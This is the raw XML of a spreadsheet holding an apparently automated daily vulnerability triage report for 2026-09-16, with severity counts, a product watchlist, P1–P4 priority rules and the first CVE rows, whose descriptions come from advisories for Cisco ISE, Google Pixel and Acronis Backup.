Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54247" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7514" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8030" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92141" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92131" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92138" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20071" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3855" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92130" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90598" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61560" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76186" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76187" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89835" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89953" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90040" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92126" TargetMode="External" Id="rId303" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59953" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61594" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61599" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-39896" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59879" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63127" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61591" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61593" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63671" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61595" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63128" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61590" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61592" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61596" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61598" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68904" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59193" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57173" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61588" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61589" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61453" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61597" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-373m-p57p-8665" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4wj4-79rr-pvff" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58657" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59965" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61560" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16246" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16245" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16244" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16247" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16204" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16205" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16206" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16207" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16208" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16209" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16210" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16211" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16212" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16213" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16214" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16215" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16216" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16217" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16219" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16220" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16222" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16223" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16224" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16225" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16226" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16227" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16228" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16229" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16230" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16231" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16232" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16233" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16234" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16235" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16236" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16237" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16238" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16239" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16240" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16241" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16242" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16243" TargetMode="External" Id="rId71" /></Relationships>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6" customWidth="1" min="1" max="1"/>
    <col width="70" customWidth="1" min="2" max="2"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Daily Vulnerability Report</t>
        </is>
      </c>
      <c r="B1" t="inlineStr"/>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>Report date</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-16T00:00 to 2026-09-17T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-17 10:06:40 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1698</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Newly published</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>923</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Updated (recently published, now scored / KEV)</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>775</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV (actively exploited)</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>131</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>694</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>559</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>74</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Unscored (awaiting NVD analysis)</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>242</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>303</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>29</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>61</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr"/>
      <c r="B18" s="3" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>Sources</t>
        </is>
      </c>
      <c r="B19" s="3" t="inlineStr">
        <is>
          <t>NVD 2.0, CISA KEV, FIRST EPSS, CISA Vulnrichment, GitHub Security Advisories, OSV.dev</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Watchlist keywords</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>microsoft:windows_server, microsoft:exchange, microsoft:sql_server, microsoft:sharepoint, oracle:database, oracle:weblogic, oracle:java, openssl, openssh, vmware, citrix, fortinet, paloaltonetworks, cisco, f5:big-ip, ibm:websphere, ibm:db2, ibm:mq, sap, apache:tomcat, apache:http_server, apache:struts, apache:kafka, apache:activemq, nginx, kubernetes, docker, jenkins, gitlab, atlassian, spring, log4j, postgresql, mysql, mongodb, redis, elastic, keycloak, okta, hashicorp, jackson-databind, fasterxml</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr"/>
      <c r="B21" s="3" t="inlineStr"/>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50, or SSVC exploitation = active</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10, or SSVC exploitation = poc</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="3" t="inlineStr">
        <is>
          <t>Everything else, incl. CVEs not yet scored by NVD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69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18" customWidth="1" min="3" max="3"/>
    <col width="7" customWidth="1" min="4" max="4"/>
    <col width="10" customWidth="1" min="5" max="5"/>
    <col width="10" customWidth="1" min="6" max="6"/>
    <col width="6" customWidth="1" min="7" max="7"/>
    <col width="7" customWidth="1" min="8" max="8"/>
    <col width="9" customWidth="1" min="9" max="9"/>
    <col width="16" customWidth="1" min="10" max="10"/>
    <col width="28" customWidth="1" min="11" max="11"/>
    <col width="28" customWidth="1" min="12" max="12"/>
    <col width="14" customWidth="1" min="13" max="13"/>
    <col width="18" customWidth="1" min="14" max="14"/>
    <col width="12" customWidth="1" min="15" max="15"/>
    <col width="11" customWidth="1" min="16" max="16"/>
    <col width="12" customWidth="1" min="17" max="17"/>
    <col width="90" customWidth="1" min="18" max="18"/>
    <col width="42" customWidth="1" min="19" max="19"/>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KEV Due</t>
        </is>
      </c>
      <c r="Q1" s="4" t="inlineStr">
        <is>
          <t>CWE</t>
        </is>
      </c>
      <c r="R1" s="4" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="S1" s="4" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-648</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to bypass authentication.
This vulnerability is due to insufficient authentication control on an API endpoint. An attacker could exploit this vulnerability by sending a crafted request to an affected API endpoint. A successful exploit could allow the attacker to gain unauthorized access to the affected device by bypassing the web-based management interface.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20130</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
